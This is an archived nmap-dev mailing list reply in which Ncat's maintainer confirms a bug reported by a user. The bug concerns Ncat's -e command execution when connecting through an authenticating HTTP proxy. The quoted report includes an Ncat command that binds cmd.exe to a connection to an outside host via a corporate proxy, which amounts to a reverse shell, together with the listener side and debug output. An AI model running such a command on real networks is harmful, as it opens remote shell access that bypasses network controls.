[prev in list] [next in list] [prev in thread] [next in thread]
List: nmap-dev
Subject: Re: NCat Proxy Support - Proxy-Authenticate
From: David Fifield <david () bamsoftware ! com>
Date: 2010-12-29 17:14:57
Message-ID: 20101229171457.GB3481 () debian ! bamsoftware ! com
[Download RAW message or body]
On Mon, Dec 06, 2010 at 12:08:40PM +0100, Florian Roth wrote:
>
> Great!
> I'll test it.
>
> --- 20min later ---
>
> It works.
> The only problem I noticed was the executing of a program after the
> connection has been established.
>
> What I did:
>
> === On the system inside the network ===========================
>
> D:\ncat-win32>ncat.exe -vvv -e cmd --proxy proxy.company.de:8080
> --proxy-auth user:pass 87.106.48.12 443
>
> Ncat: Version 5.36TEST2 ( http://nmap.org/ncat )
> NCAT DEBUG: Proxy returned status code 407.
> NCAT DEBUG: Reconnection header:
> CONNECT 87.106.48.12:443 HTTP/1.0
> Proxy-Authorization: Basic XxxxXXXxxxxXXXXXxxxX==
>
> NCAT DEBUG: Proxy returned status code 200.
> NSOCK (0.0000s) Read request from IOD #1 (peer unspecified) (timeout:
> -1ms) EID 10
> NSOCK (0.0000s) Read request for 0 bytes from IOD #2 (peer unspecified)
> EID 18
> NSOCK (36.3590s) Callback: READ SUCCESS for EID 10 [(null):65535] (4
> bytes)
>
> dir
>
> NSOCK (36.3590s) Read request for 0 bytes from IOD #1 [(null):65535] EID
> 26
> NSOCK (49.9370s) Callback: READ SUCCESS for EID 26 [(null):65535] (11
> bytes)
>
> systeminfo
>
> NSOCK (49.9370s) Read request for 0 bytes from IOD #1 [(null):65535] EID
> 34
>
> === On the external system ======================================
>
> s15218815:~# ncat -v -l 443
> Ncat: Version 5.35DC1 ( http://nmap.org/ncat )
> Ncat: Listening on 0.0.0.0:443
> Ncat: Connection from 186.23.100.10:39925.
> dir
> systeminfo
>
> =================================================================
>
> The commands written on the external system appear in the terminal but
> the "cmd.exe" has not been executed by ncat before so they just
> interchange the characters.
> I first thought - well - perhaps this feature is not meant to be used on
> a client which connects over a proxy server. Without the proxy server
> between the systems this works like a charm.
> I thought that the CONNECT request has to be initialized by the internal
> system and therefore there cannot be a command transmitter outside that
> sends the commands inwards.
> Although the characters appear inside while writing on the outside
> system.
>
> Am I right, or is this a bug?
You are correct, this is a bug. I added a test for it and made a TODO to
fix it.
David Fifield
_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic